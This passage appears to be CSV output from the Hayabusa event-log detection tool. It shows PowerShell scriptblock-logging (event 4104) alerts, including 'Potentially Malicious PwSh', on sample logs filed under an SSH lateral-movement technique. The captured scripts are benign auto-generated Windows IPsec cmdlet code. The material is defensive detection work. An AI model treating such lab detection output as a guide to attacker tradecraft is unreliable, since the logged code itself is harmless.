(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"uery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' -Alias '*' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] 
[ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent 
= $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"uery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', 
${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; 
IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' -Alias '*' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
$script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains 